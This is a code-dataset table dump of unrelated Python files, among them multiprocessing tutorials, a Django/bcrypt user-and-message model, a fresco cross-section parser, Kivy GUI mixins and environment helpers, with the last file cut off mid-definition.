index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
984,600 | 1e6505e0a1f57a66f04b51ef9f4563f72ac0c13d | #!/usr/bin/env python
# Author: weikun
# Created Time: Mon 25 Mar 2019 10:17:01 AM CST
f = open('SUMMARY.md', 'r+')
infos = f.readlines()
f.close()
dirs=[]
dirHash = {}
curDir = None
curDirName = None
for info in infos[4:]:
info = info.strip('\n')
if info.startswith('###'):
curDir = []
curDirName = info[info.find(' ') + 1:]
dirs.append((curDirName, curDir))
elif info.startswith('*'):
name = info[info.find('[') + 1:info.find(']')]
filePath = info[info.find('(') + 1:info.find(')')]
print name, filePath
curDir.append((name, filePath))
if dirHash.get(filePath.split('/')[0], None) == None:
dirHash[filePath.split('/')[0]] = (curDirName, curDir)
import os
def rebuildName(fileName):
    """Turn a post file name like '2019_03_25_some_title.md' into 'Some title'.

    Strips the 11-char date prefix ('YYYY_MM_DD_') and the '.md' suffix,
    replaces underscores with spaces and capitalizes the first letter.
    """
    stem = fileName[11:-3]  # drop 'YYYY_MM_DD_' (11 chars) and '.md' (3 chars)
    return stem.replace('_', ' ').capitalize()
def checkRepeat(fileName, curDir):
    """Return True if fileName is NOT already listed in curDir.

    curDir is a list of (displayName, filePath) tuples; only filePath is
    compared.  Bug fix: the previous version returned True as soon as the
    *first* entry failed to match, so duplicates later in the list were
    missed; the whole list is now scanned before deciding.
    """
    for name, fName in curDir:
        if fName == fileName:
            return False
    return True
# Walk the working tree and append every .md file that is not yet listed in
# its section; directories with no section yet get a brand new one.
for maindir, subdir, file_name_list in os.walk('.'):
    if not file_name_list:
        continue
    if '_book' in maindir:
        continue  # skip gitbook build output
    if not maindir.startswith('./'):
        continue  # skip the repository root itself
    pathDirName = maindir[len('./'):]
    for file_name in file_name_list:
        if not file_name.endswith('.md'):
            continue
        fileName = file_name
        relPath = '%s/%s' % (pathDirName, fileName)
        if pathDirName in dirHash:
            curDirName, curDir = dirHash[pathDirName]
            if checkRepeat(relPath, curDir):
                curDir.append((rebuildName(fileName), relPath))
        else:
            curDirName = pathDirName.capitalize()
            curDir = []
            dirHash[pathDirName] = (curDirName, curDir)
            dirs.append((curDirName, curDir))
            curDir.append((rebuildName(fileName), relPath))

# Regenerate SUMMARY.md from the (possibly extended) section list.
writeinfos = []
writeinfos.append('### Summary\n')
writeinfos.append('* [Introduction](README.md)\n')
for name, curDir in dirs:
    writeinfos.append('### %s\n' % (name))
    for d in curDir:
        writeinfos.append('* [%s](%s)' % (d[0], d[1]))
    writeinfos.append('\n')
f = open('SUMMARY.md', 'w+')
f.writelines('\n'.join(writeinfos))
f.close()
|
#!/usr/bin/env python3
# coding utf-8
# NOTE: every example in this file is deliberately disabled by being wrapped
# in a triple-quoted string literal; unquote one example at a time to run it.

# Example 1: Process.join() -- parent blocks until the child finishes.
''''
# join 方法
from multiprocessing import Process
import time,os
def task():
# print('%s is running' %os.getpid())
print('%s is running ,parnt id <%s>' % (os.getpid(), os.getppid()))
time.sleep(3)
# print('%s is done' %os.getpid())
print('%s is done ,parnt id <%s>' % (os.getpid(), os.getppid()))
if __name__ == '__main__':
p = Process(target=task, )
p.start()
p.join()
print('主', os.getpid(), os.getppid())
print(p.pid)
'''
# Example 2: start all three children first, then join -- total elapsed time
# is roughly max(5, 3, 2) seconds (children run concurrently).
'''
from multiprocessing import Process
import time,os
def task(name,n):
print('%s is running' %name)
time.sleep(n)
if __name__ == '__main__':
start = time.time()
p1 = Process(target=task,args=('子进程1',5) )
p2 = Process(target=task,args=('子进程2',3) )
p3 = Process(target=task,args=('子进程3',2) )
p_list = [p1,p2,p3]
# p1.start()
# p2.start()
# p3.start()
for p in p_list:
p.start()
# p1.join()
# p2.join()
# p3.join()
for p in p_list:
p.join()
print('主', (time.time()-start))
'''
# Example 3: start/join each child in sequence -- total elapsed time is the
# sum 5 + 3 + 2 seconds (children run serially).
'''
from multiprocessing import Process
import time,os
def task(name,n):
print('%s is running' %name)
time.sleep(n)
if __name__ == '__main__':
start = time.time()
p1 = Process(target=task,args=('子进程1',5) )
p2 = Process(target=task,args=('子进程2',3) )
p3 = Process(target=task,args=('子进程3',2) )
p1.start()
p1.join()
p2.start()
p2.join()
p3.start()
p3.join()
print('主', (time.time()-start))
'''
# Example 4: Process.is_alive() right after start().
''''
# is_alive 方法
from multiprocessing import Process
import time,os
def task():
# print('%s is running' %os.getpid())
print('%s is running ,parnt id <%s>' % (os.getpid(), os.getppid()))
time.sleep(3)
# print('%s is done' %os.getpid())
print('%s is done ,parnt id <%s>' % (os.getpid(), os.getppid()))
if __name__ == '__main__':
p = Process(target=task, )
p.start()
print(p.is_alive())
p.join()
print('主', os.getpid(), os.getppid())
print(p.pid)
'''
# Example 5: terminate() then sleep -- is_alive() reports False afterwards.
'''
from multiprocessing import Process
import time,os
def task():
# print('%s is running' %os.getpid())
print('%s is running ,parnt id <%s>' % (os.getpid(), os.getppid()))
time.sleep(3)
# print('%s is done' %os.getpid())
print('%s is done ,parnt id <%s>' % (os.getpid(), os.getppid()))
if __name__ == '__main__':
p = Process(target=task, )
p.start()
p.terminate()
time.sleep(3)
print(p.is_alive())
p.join()
print('主')
'''
# Example 6: same as above, plus naming the child via Process(name=...).
'''
from multiprocessing import Process
import time,os
def task():
# print('%s is running' %os.getpid())
print('%s is running ,parnt id <%s>' % (os.getpid(), os.getppid()))
time.sleep(3)
# print('%s is done' %os.getpid())
print('%s is done ,parnt id <%s>' % (os.getpid(), os.getppid()))
if __name__ == '__main__':
p = Process(target=task,name='sub-precess' )
p.start()
p.terminate()
time.sleep(3)
print(p.is_alive())
p.join()
print('主')
print(p.name)
'''
984,602 | 5d40e24476f2a68970b7664bef769cb3e6fa43dd | import matplotlib.pyplot as plt
import numpy as np
import random
import SimpleITK as sitk # For loading the dataset
import torch
import torch.nn as nn
from torch.utils.data import Dataset
import os
import math
def read_img(img_path):
    """
    Reads a .nii.gz image and returns as a numpy array.
    """
    itk_image = sitk.ReadImage(img_path)
    return sitk.GetArrayFromImage(itk_image)
def get_datapath(datadir, random_state, test_size = 0.25):
    """Collect index-aligned (image, mask) path lists under datadir.

    Any file whose name contains 'mask' is treated as a mask; its image is
    the same file name with '_mask' removed, in the same directory.

    random_state / test_size are kept for interface compatibility but are
    unused here (no train/test split is performed in this function).

    Returns (image_list, mask_list).
    """
    image_list = []
    mask_list = []
    for dirname, _, filenames in os.walk(datadir):
        for filename in filenames:
            if 'mask' in filename:
                # Bug fix: joining against the real walk dirname.  The old
                # code rebuilt the path via dirname.replace(datadir, ''),
                # which yields a leading os.sep for subdirectories, making
                # os.path.join discard datadir entirely.
                mask_list.append(os.path.join(dirname, filename))
                image_list.append(os.path.join(dirname, filename.replace('_mask', '')))
    return image_list, mask_list
class DataSegmentationLoader(Dataset):
    """Dataset yielding (image, mask) tensor pairs from .nii file paths.

    path_list   -- image file paths.
    ground_list -- optional mask file paths, index-aligned with path_list.
                   When absent, an all-zero mask is returned instead.
    """
    def __init__(self, path_list, ground_list=None):
        # Bug fix: the previous mutable default (ground_list=[]) was a
        # single list shared by every instance; None is the sentinel now.
        self.sample = path_list
        self.ground_truth = ground_list if ground_list else []

    def __len__(self):
        return len(self.sample)

    def __getitem__(self, idx):
        # Images are assumed to be 3x256x256 with values in [0, 255];
        # scale to [0, 1].  (TODO confirm the fixed 256x256 assumption.)
        data = read_img(self.sample[idx]).reshape(3, 256, 256) / 255
        if len(self.ground_truth) > 0:
            label = read_img(self.ground_truth[idx]).reshape(1, 256, 256) / 255
        else:
            label = np.zeros((1, 256, 256))
        return torch.from_numpy(data).float(), torch.from_numpy(label).long()
984,603 | 99ab9bac11918993f6e934fe67bc60944574930a | import logging
import shutil
import subprocess
import uuid
import jsonlines
from murakami.errors import RunnerError
from murakami.runner import MurakamiRunner
logger = logging.getLogger(__name__)
class DashClient(MurakamiRunner):
    """Murakami runner that wraps the Neubot `dash-client` binary."""

    def __init__(self, config=None, data_cb=None,
                 location=None, network_type=None, connection_type=None,
                 device_id=None):
        super().__init__(
            title="DASH",
            description="The Neubot DASH network test.",
            config=config,
            data_cb=data_cb,
            location=location,
            network_type=network_type,
            connection_type=connection_type,
            device_id=device_id,
        )

    @staticmethod
    def _start_test():
        logger.info("Starting DASH test...")
        # Fail fast when the binary is not on PATH.
        if shutil.which("dash-client") is None:
            raise RunnerError(
                "dash",
                "Executable dash-client does not exist, please install DASH.")
        completed = subprocess.run(["dash-client"],
                                   check=True,
                                   text=True,
                                   capture_output=True)
        logger.info("Dash test complete.")
        # TODO: write parser. Only print the last line for now.
        return completed.stdout.splitlines()[-1]
|
984,604 | 323d6177a3d179e4725d44ad4ba11d261ef84b70 | """
This module implements a meter service.
A meter service reads a consumption value and sends it to a predefined broker.
The current implementation mocks the reading by generating a uniformly distributed value between 0 and 9000.
Author: Ludovic Mouline
"""
from __future__ import annotations
import logging
import time
import json
from random import uniform
from typing import TypedDict, TYPE_CHECKING
if TYPE_CHECKING:
import pv_simulator.broker
# Bounds for the mocked consumption reading (uniformly sampled between them).
_MIN_CONS = 0
_MAX_CONS = 9000
class MeterValMsg(TypedDict):
    """Type of the message sent through the broker."""
    meter_id: str  # id of the meter that produced the reading
    value: float   # consumption reading (mocked uniform draw)
    time_s: int    # unix timestamp in seconds at read time
class MeterFactory:
    """Process-wide singleton that hands out meters with sequential ids."""

    _instance = None

    def __init__(self):
        # Guard against direct instantiation; callers should use instance().
        if MeterFactory._instance is not None:
            raise Exception("This class is a singleton!")
        MeterFactory._instance = self
        self.__BASE_ID = "Meter_"
        self.__id_next = 0

    @staticmethod
    def instance() -> MeterFactory:
        """Return the unique factory, creating it on first use."""
        if MeterFactory._instance is None:
            MeterFactory()
        return MeterFactory._instance

    def new_meter(self, broker: pv_simulator.broker.Producer) -> Meter:
        """Create a Meter bound to broker, with the next sequential id."""
        meter_id = self.__BASE_ID + str(self.__id_next)
        self.__id_next += 1
        return Meter(meter_id, broker)
class Meter:
    """
    Representation of a meter where the id is: Meter <NB>, where NB is an integer that increases at each creation of
    a meter.
    WARNING: this approach cannot be used in a multi-threading application, or the meter id will not be unique.
    """
    def __init__(self, m_id: str, broker: pv_simulator.broker.Producer):
        """You should not directly call the constructor. We recommended using the factory."""
        self.meter_id = m_id
        self.broker = broker
        # One broker channel per meter, keyed by the meter id.
        self.broker.open_channel(self.meter_id)

    def read_consumption(self) -> float:
        # Mocked reading: uniform draw between the module-level bounds.
        return uniform(_MIN_CONS, _MAX_CONS)

    def send_consumption(self) -> None:
        """Read one value and publish it as a JSON-encoded MeterValMsg."""
        v = self.read_consumption()
        msg = MeterValMsg(meter_id=self.meter_id, value=v, time_s=int(time.time()))
        to_send = json.dumps(msg)
        # NOTE(review): send_msg receives the Meter object itself, while
        # open_channel/del_channel receive self.meter_id -- confirm the
        # Producer API really expects the meter instance here.
        self.broker.send_msg(self, to_send)
        logging.info(f"Message sent: {to_send}")

    def __del__(self):
        # Best-effort channel cleanup when the meter is garbage-collected.
        self.broker.del_channel(self.meter_id)
|
import sys
input = sys.stdin.readline


def has_prefix_pair(numbers):
    """Return True if any string in numbers is a prefix of another.

    After sorting, a prefix (if present) sorts immediately before some
    string that extends it, so only adjacent pairs need checking.
    """
    ordered = sorted(numbers)
    for shorter, longer in zip(ordered, ordered[1:]):
        if longer.startswith(shorter):
            return True
    return False


if __name__ == '__main__':
    # One test case per line-count n; a list is consistent ("YES") iff no
    # number is a prefix of another.
    t = int(input())
    for _ in range(t):
        n = int(input())
        num_list = [input().strip() for _ in range(n)]
        print("NO" if has_prefix_pair(num_list) else "YES")
from django.urls import path
from . import views

# URL routes for this app; intentionally empty until API endpoints exist.
urlpatterns = [
    #No paths for now
    #path('api/',)
]
984,607 | d2f1ae4c1ab73b7b5370a950dbf0e911650ab591 | # -*- coding: utf-8 -*-
# !/Library/Frameworks/Python.framework/Versions/3.5/bin/python3
from bs4 import BeautifulSoup
from urllib.request import urlopen
import re
def getText(base_url, til_url):
    """Crawl a biquge table-of-contents page and download chapters.

    Chapter links are skipped until the anchor titled
    '第一百四十七章 大难不死必有后福' is seen; from that chapter onward every
    linked chapter is fetched via getContent().
    """
    content = urlopen(base_url + til_url)
    bsObj = BeautifulSoup(content, "lxml")
    record = False
    for dd in bsObj.findAll('dd'):
        for link in dd.findAll('a'):
            if 'href' not in link.attrs:
                continue
            if link.get_text() == '第一百四十七章 大难不死必有后福':
                record = True  # start downloading from this chapter onwards
            else:
                print("skip->" + link.get_text())
            if record:
                print("output->" + link.get_text())
                print(link.attrs['href'])
                getContent(base_url + link.attrs['href'])
    # (Removed the dead counter: the original's bare "i + 1" statement was a
    # no-op and i was never read.)
def getContent(url):
    """Fetch one chapter page and append its text to './<chapter>.txt'.

    The output file name is the part of the page title after the first '_'.
    """
    content = urlopen(url)
    bsObj = BeautifulSoup(content, "lxml")
    title = str(bsObj.title.get_text())
    # with-statement: the handle is now closed even if the body lookup
    # below raises (the old code leaked it on error).
    with open("./" + title.split("_")[1] + ".txt", 'a') as tfile:
        tfile.write("\n\n\n" + str(bsObj.title.get_text()) + "\n")
        tfile.write(bsObj.find_all("div", {"id": "content"})[0].get_text())
getText("https://www.biquge.com.tw", "/6_6967/")
|
"""
This script can be run with pure "python". (pytest not needed).
"get_driver()" is from [seleniumbase/core/browser_launcher.py].
"""
from seleniumbase import get_driver
from seleniumbase import js_utils
from seleniumbase import page_actions

# Drive the demo calculator: press "4" then "2" and expect "42" displayed.
driver = get_driver("chrome", headless=False)
try:
    driver.get("https://seleniumbase.io/apps/calculator")
    page_actions.wait_for_element_visible(driver, "4", "id").click()
    page_actions.wait_for_element_visible(driver, "2", "id").click()
    page_actions.wait_for_text_visible(driver, "42", "output", "id")
    # Flash the result field so a human watcher can see the outcome.
    js_utils.highlight_with_js(driver, "#output", 6, "")
finally:
    # Always close the browser, even if a wait above timed out.
    driver.quit()
import requests
from requests import sessions

# Without a Session: /cookies/set/name/Bill asks the server to set a cookie
# named "name" with the value "Bill" on this one-off connection.
requests.get('http://httpbin.org/cookies/set/name/Bill')
# Second stand-alone request: the two requests share no Session, so the
# cookie set by the first request cannot be seen by the second.
r1 = requests.get('http://httpbin.org/cookies')
print(r1.text)
# With a Session: create the Session object once...
session = requests.Session()
# ...the first request stores the cookie in the session's cookie jar...
session.get('http://httpbin.org/cookies/set/name/Bill')
# ...and the second request on the same Session sends it back.
r2 = session.get('http://httpbin.org/cookies')
print(r2.text)
# Keep prompting (in Spanish) until the user enters a positive integer,
# echo it, then print "fin".
while True:
    n = int(input("ingresa un numero positivo: "))
    if n > 0:
        print(n)
        break
    else:
        print("ingresa un numero positivo valido")
print("fin")
984,611 | 4f0fa3649e71428f42b3c8debb0cc9229678de73 | #Program takes fresco .out output as its input and converts to just angle and angular cross-section
import sys
import matplotlib.pyplot as plt
# import matplotlib.axes.Axes as axes
def hasNumbers(inputString):
    """Return True if inputString contains at least one decimal digit."""
    for ch in inputString:
        if ch.isdigit():
            return True
    return False
angle_list=[]
# cross_section_list=[]
# Reference datasets (Burlein 1984 / TUNL); these stay empty unless the
# commented-out loaders inside main() are re-enabled.
burlein_angles=[]
burlein_cross_sections=[]
tunl_angles=[]
tunl_cross_sections=[]
def main():  # if running with run_fresco.py, place filename as an argument here
    """Convert a fresco .out file (sys.argv[1]) to angle/cross-section data.

    Pass 1 over the file extracts E_x, J^pi and the transferred L from the
    header lines and opens the derived output file; pass 2 collects each
    outgoing reaction's angular distribution; finally the second reaction's
    values for 0..179 degrees are printed and written to the output file.
    """
    filename = sys.argv[1]
    print(filename)

    # Per-reaction storage.  (Note: the original's '[] * m' is just '[]',
    # so rows always start empty and grow by append.)
    n = 5
    m = 180
    cross_section_list = [[] for _ in range(n)]
    angle_list = [[] for _ in range(n)]

    output_filename = filename[:-3] + 'dat'
    print(output_filename)
    filein = open(filename, "r")
    input_data = filein.readlines()
    data_flag = 0
    reaction_counter = 0

    for line in input_data:
        if line.startswith(" 2: J= 0.5+"):
            print("line with info found")
            # list(...) is required: under Python 3 filter() returns an
            # iterator, and the original crashed when indexing token[12].
            token = list(filter(None, line.split(" ")))
            print(token)
            print(token[12], token[16])
            J_pi = token[12]
            E_x = token[16][:6]
            J = J_pi[:1]
            pi = J_pi[-1]
            print(E_x)
            print(J)
            print(pi)
            print("Ex= {} J_pi= {} {}".format(E_x, J, pi))
        if line.startswith("0 3: "):
            # Third single-particle form factor: fresco always uses it for
            # the second output, so this needn't change per L transfer.
            print("line with L transfer number found")
            token = list(filter(None, line.split(" ")))
            print(token)
            print(token[7])
            delta_L = token[7]
            print("L={}".format(delta_L))
            output_filename = ("fresco_outputs_bcfec/mg26dp_dwba_" + E_x +
                               "_" + J + pi + "_" + delta_L + ".dat")
            print("output filename is {}".format(output_filename))
            fileout = open(output_filename, "w")

    filein.close()
    filein = open(filename, "r")

    # Pass 2: harvest the angular distributions between the
    # "CROSS SECTIONS FOR OUTGOING p" marker and "Finished all xsecs".
    for line in input_data:
        if line.startswith(" Finished all xsecs"):
            data_flag = 0
            print("End of all cross-section data reached, data flag set to 0")
        if data_flag == 1:
            token = list(filter(None, line.split(" ")))
            # Only data rows start with a number; skip headers/separators.
            if hasNumbers(token[0]):
                angle_list[reaction_counter].append(float(token[0]))
                cross_section_list[reaction_counter].append(float(token[4]))
        if line.startswith(" CROSS SECTIONS FOR OUTGOING p "):
            data_flag = 1
            print("Cross-section data reached, data flag set to 1")
            print(line)
        if line.startswith(" 180.00 deg"):
            print("End of one reaction reached")
            print("Reaction counter is {}".format(reaction_counter))
            reaction_counter = reaction_counter + 1

    # Emit reaction 1 (the second outgoing channel), one line per degree.
    # NOTE(review): assumes at least m data points were collected per
    # reaction; fewer raises IndexError (unchanged behaviour).
    for i in range(0, m):
        cross_section_list[0][i] = 1 * cross_section_list[0][i]
        cross_section_list[1][i] = 1 * cross_section_list[1][i]
        print("{}\t{}\n".format(i, cross_section_list[1][i]))
        fileout.write("{}\t{}\n".format(i, cross_section_list[1][i]))

    print(burlein_cross_sections)  # empty unless reference loaders restored
    angle_list[3] = angle_list[1]

    filein.close()  # Good practice
    fileout.close()
    print(cross_section_list[1][0])
    print(output_filename)
    return ()
main() #if running with run_fresco.py, comment this line out
|
984,612 | 9e58bdb66a6c7f161fdc44498ffa427ba586f703 |
import os
from ..log import NodeLoggingMixin
from ..http import HttpClientMixin
from ..basemixin import BaseGuiMixin
from ..widgets.image import BleedImage
from ..widgets.labels import ColorLabel
from ..widgets.image import StandardImage
from ..widgets.labels import SelfScalingLabel
from ..widgets.colors import ColorBoxLayout
class ModularApiEngineManagerMixin(HttpClientMixin, NodeLoggingMixin):
    """Keeps a registry of modular API engines and manages their lifecycle."""

    def __init__(self, *args, **kwargs):
        super(ModularApiEngineManagerMixin, self).__init__(*args, **kwargs)
        self._api_engines = []
        self._api_primary = None

    def modapi_install(self, engine, primary=False):
        """Register an engine; optionally mark it as the primary one."""
        self.log.info("Installing Modular API Engine {0}".format(engine))
        self._api_engines.append(engine)
        if primary:
            self._api_primary = engine

    def modapi_activate(self):
        """Start every installed engine."""
        for installed in self._api_engines:
            self.log.info("Starting Modular API Engine {0}".format(installed))
            installed.start()

    def modapi_engine(self, name):
        """Return the installed engine with the given name, or None."""
        return next((e for e in self._api_engines if e.name == name), None)

    def modapi_stop(self):
        """Stop every installed engine."""
        for installed in self._api_engines:
            self.log.info("Stopping Modular API Engine {0}".format(installed))
            installed.stop()

    def start(self):
        super(ModularApiEngineManagerMixin, self).start()
        self.modapi_activate()

    def stop(self):
        self.modapi_stop()
        super(ModularApiEngineManagerMixin, self).stop()
class ModularApiEngineManagerGuiMixin(ModularApiEngineManagerMixin, BaseGuiMixin):
    """GUI layer over the engine manager: shows/hides status indicators for
    the internet link name, internet reachability and per-API connectivity,
    driven by the modapi_signal_* callbacks."""
    def __init__(self, *args, **kwargs):
        super(ModularApiEngineManagerGuiMixin, self).__init__(*args, **kwargs)
        self._api_internet_link = None  # last reported link text
        self._api_internet_link_indicator = None  # transient label widget
        self._api_internet_connected = False
        self._api_internet_indicator = None  # persistent "no internet" icon
        self._api_connection_status = {}  # prefix -> connected?
        self._api_connection_indicators = {}  # prefix -> indicator widget
    @property
    def modapi_internet_link_indicator(self):
        # Lazily build a red label showing the current internet link text.
        if not self._api_internet_link_indicator:
            params = {'bgcolor': (0xff / 255., 0x00 / 255., 0x00 / 255., 0.3),
                      'color': [1, 1, 1, 1]}
            self._api_internet_link_indicator = ColorLabel(
                text=self._api_internet_link, size_hint=(None, None),
                height=50, font_size='14sp',
                valign='middle', halign='center', **params
            )
            # Grow the label to fit its rendered text (plus padding).
            def _set_label_width(_, texture_size):
                self._api_internet_link_indicator.width = texture_size[0] + 20
            self._api_internet_link_indicator.bind(texture_size=_set_label_width)
        return self._api_internet_link_indicator
    def _modapi_internet_link_indicator_show(self, duration=5):
        # Touch the property so the widget exists, then attach it once.
        _ = self.modapi_internet_link_indicator
        if not self._api_internet_link_indicator.parent:
            self.gui_notification_stack.add_widget(self._api_internet_link_indicator)
            self.gui_notification_update()
        if duration:
            # Auto-dismiss after `duration` seconds.
            self.reactor.callLater(duration, self._modapi_internet_link_indicator_clear)
    def _modapi_internet_link_indicator_clear(self):
        if self._api_internet_link_indicator and self._api_internet_link_indicator.parent:
            self.gui_notification_stack.remove_widget(self._api_internet_link_indicator)
            self.gui_notification_update()
        # Drop the widget so the next show re-creates it with fresh text.
        self._api_internet_link_indicator = None
    @property
    def modapi_internet_indicator(self):
        # Lazily build the "no internet" image indicator.
        if not self._api_internet_indicator:
            _root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
            _source = os.path.join(_root, 'images', 'no-internet.png')
            self._api_internet_indicator = BleedImage(
                source=_source, pos_hint={'left': 1},
                size_hint=(None, None), height=50, width=50,
                bgcolor=(0xff / 255., 0x00 / 255., 0x00 / 255., 0.3),
            )
        return self._api_internet_indicator
    def _modapi_internet_indicator_show(self):
        if not self.modapi_internet_indicator.parent:
            self.gui_notification_row.add_widget(self.modapi_internet_indicator)
            self.gui_notification_update()
    def _modapi_internet_indicator_clear(self):
        if self.modapi_internet_indicator.parent:
            self.modapi_internet_indicator.parent.remove_widget(self.modapi_internet_indicator)
            self.gui_notification_update()
    def modapi_connection_indicator(self, prefix):
        # One cached indicator (icon + prefix caption) per API prefix.
        if prefix not in self._api_connection_indicators.keys():
            _root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
            source = os.path.join(_root, 'images', 'no-server.png')
            indicator = ColorBoxLayout(
                pos_hint={'left': 1}, orientation='vertical', padding=(0, 0, 0, 5),
                size_hint=(None, None), height=70, width=50, spacing=0,
                bgcolor=(0xff / 255., 0x00 / 255., 0x00 / 255., 0.3),
            )
            indicator.add_widget(
                StandardImage(source=source, size_hint=(1, None), height=50)
            )
            indicator.add_widget(
                SelfScalingLabel(text=prefix,
                                 size_hint=(1, None), height=15)
            )
            self._api_connection_indicators[prefix] = indicator
        return self._api_connection_indicators[prefix]
    def _modapi_connection_indicator_show(self, prefix):
        if not self.modapi_connection_indicator(prefix).parent:
            self.gui_notification_row.add_widget(self.modapi_connection_indicator(prefix))
            self.gui_notification_update()
    def _modapi_connection_indicator_clear(self, prefix):
        if self.modapi_connection_indicator(prefix).parent:
            self.modapi_connection_indicator(prefix).parent.remove_widget(self.modapi_connection_indicator(prefix))
            self.gui_notification_update()
    def modapi_signal_internet_link(self, value, prefix):
        # Show the (new) link name briefly in the notification stack.
        self._api_internet_link = value
        self._modapi_internet_link_indicator_show()
    def modapi_signal_internet_connected(self, value, prefix):
        # Icon is shown while disconnected, hidden when connectivity returns.
        if not value:
            self._modapi_internet_indicator_show()
        else:
            self._modapi_internet_indicator_clear()
        self._api_internet_connected = value
    def modapi_signal_api_connected(self, value, prefix):
        if not value:
            self._modapi_connection_indicator_show(prefix)
        else:
            self._modapi_connection_indicator_clear(prefix)
        self._api_connection_status[prefix] = value
|
984,613 | e7ed0efc3bbe6978dc14b66d07ff0f5cf2f5368c | from django.contrib import admin
import models
# All ballroom app models, registered with the default admin site below.
ballroom_models = [
    models.Level,
    models.Style,
    models.Dance,
    models.Position,
    models.Figure,
    models.Routine,
    models.Video,
    models.Profile,
    models.FigureInstance,
    models.Annotation
]
# admin.site.register accepts an iterable of model classes.
admin.site.register(ballroom_models)
|
984,614 | 9034b64c0bb317a33ed9bab518e898f5517d19a3 | from bcrypt import hashpw, gensalt
class Message:
    """
    Represents message in database
    """
    def __init__(self, text, sender_id, recipient_id):
        self.text = text
        self.sender_id = sender_id
        self.recipient_id = recipient_id

    def send(self, cursor):
        """Insert this message via the given DB-API cursor."""
        sql = 'INSERT INTO message(sender_id, recipient_id, content) \
        VALUES (%s, %s, %s)'
        cursor.execute(sql, (self.sender_id, self.recipient_id, self.text))

    @staticmethod
    def list_all(cursor, user_id):
        """Print every message addressed to user_id."""
        sql = 'SELECT * FROM message WHERE recipient_id=%s'
        cursor.execute(sql, (user_id,))
        for record in cursor:
            message = Message(record[3], record[1], record[2])
            print(message)

    @staticmethod
    def delete(cursor, message_id):
        """Delete the message with the given id.

        Bug fix: message_id is now actually bound to the %s placeholder;
        the previous version called execute() with no parameters at all.
        """
        sql = 'DELETE FROM message WHERE id=%s'
        cursor.execute(sql, (message_id,))
        return

    def __str__(self):
        return 'from: {0}, to: {1}, \n content: {2}'.format(self.sender_id, self.recipient_id, self.text)
class User:
    """
    represents user record in database
    """
    def __init__(self):
        self.username = ''
        self.__hashed_password = ''  # bcrypt hash; set via set_password or DB load
        self.email = ''
        self.__id = -1  # -1 means "not yet persisted"

    @property
    def user_id(self):
        return self.__id

    @property
    def hashed_password(self):
        return self.__hashed_password

    def set_password(self, password):
        # bcrypt with cost factor 10; hashpw stores salt inside the hash.
        self.__hashed_password = hashpw(password.encode(), gensalt(10))

    def save_to_db(self, cursor):
        """Insert this user if it was never saved; return False otherwise."""
        if self.__id == -1:
            sql = 'INSERT INTO users(email, username, hashed_password)\
            VALUES (%s, %s, %s)'
            params = (self.email, self.username, self.hashed_password)
            cursor.execute(sql, params)
            return True
        return False

    def authenticate(self, cursor, username, password_attempt):
        """Load the row for username and verify password_attempt.

        On a hit, this object's id/email/hash are populated from the row
        (NOTE(review): username itself is not copied back).  True is
        returned only when re-hashing the attempt with the stored salt
        reproduces the stored hash.
        """
        sql = 'SELECT * FROM users WHERE username=%s LIMIT 1'
        cursor.execute(sql, (username,))
        data = cursor.fetchone()
        if data is not None:
            self.__hashed_password = data[3]
            self.__id = data[0]
            self.email = data[1]
        if (all([self.__hashed_password, password_attempt]) and
            hashpw(
                password_attempt.encode(),
                self.hashed_password.encode()
            ) == self.hashed_password.encode()):
            return True
        return False

    @staticmethod
    def load_user_by_id(cursor, user_id):
        """Return a User built from the row with the given id, or None."""
        sql = 'SELECT * FROM users where id = %s'
        params = (user_id,)
        cursor.execute(sql, params)
        data = cursor.fetchone()
        if data is not None:
            u = User()
            u.__id = data[0]  # name mangling resolves to _User__id here
            u.email = data[1]
            u.username = data[2]
            u.__hashed_password = data[3]
            return u
        return None

    def update_pass(self, cursor):
        """Persist the current hashed password for this user's row."""
        sql = 'UPDATE users SET hashed_password=%s WHERE id=%s;'
        params = (self.hashed_password, self.__id)
        cursor.execute(sql, params)
        return True

    @staticmethod
    def load_all_users(cursor):
        """Return a list of User objects, one per row in users."""
        sql = 'SELECT * FROM users'
        cursor.execute(sql)
        data = cursor.fetchall()
        users = list()
        for user in data:
            u = User()
            u.__id = user[0]
            u.email = user[1]
            u.username = user[2]
            u.__hashed_password = user[3]
            users.append(u)
        return users

    def del_user(self, cursor):
        """Delete this user's row and mark the object as unsaved."""
        sql = 'DELETE FROM users WHERE id=%s'
        cursor.execute(sql, (self.__id,))
        self.__id = -1
        return True

    def __str__(self):
        return 'User: {0}, id: {1}'.format(self.username, str(self.__id))
|
984,615 | 128b84754c70b4278e80a5cb5ade6ad683806825 | import datetime
import os
import shutil
import tempfile
from contextlib import contextmanager
@contextmanager
def environment_append(env_vars):
    """Temporarily apply env_vars on top of os.environ.

    Semantics:
      * value None -> the variable is unset for the duration
      * list value -> joined with os.pathsep, and any pre-existing value of
        that variable is appended after the new entries
    The exact previous environment is restored on exit.

    NOTE(review): env_vars itself is mutated (None keys popped, list values
    joined) -- confirm no caller reuses the dict afterwards.
    """
    unset_vars = []
    for key in env_vars.keys():
        if env_vars[key] is None:
            unset_vars.append(key)
    for var in unset_vars:
        env_vars.pop(var, None)
    for name, value in env_vars.items():
        if isinstance(value, list):
            env_vars[name] = os.pathsep.join(value)
            old = os.environ.get(name)
            if old:
                env_vars[name] += os.pathsep + old
    if env_vars or unset_vars:
        old_env = dict(os.environ)
        os.environ.update(env_vars)
        for var in unset_vars:
            os.environ.pop(var, None)
        try:
            yield
        finally:
            # Restore the exact pre-entry environment.
            os.environ.clear()
            os.environ.update(old_env)
    else:
        yield
@contextmanager
def chdir(newdir):
    """Temporarily change the working directory to newdir.

    If the current directory cannot be determined (e.g. it was deleted),
    or no longer exists on exit, no restore is attempted.
    """
    try:
        previous = os.getcwd()
    except:
        previous = None
    os.chdir(newdir)
    try:
        yield
    finally:
        if previous and os.path.exists(previous):
            os.chdir(previous)
def iso_now():
    """Current UTC time as an ISO-8601 string with zeroed milliseconds."""
    stamp = datetime.datetime.utcnow().isoformat()
    return stamp.split(".")[0] + ".000Z"
@contextmanager
def tmp_folder():
    """Create a temp directory, chdir into it, remove it afterwards."""
    scratch = tempfile.mkdtemp()
    try:
        with chdir(scratch):
            yield scratch
    finally:
        shutil.rmtree(scratch)
def cur_folder():
    """Current working directory with forward slashes (Windows-friendly)."""
    here = os.getcwd()
    return here.replace("\\", "/")
def load(path, binary=False):
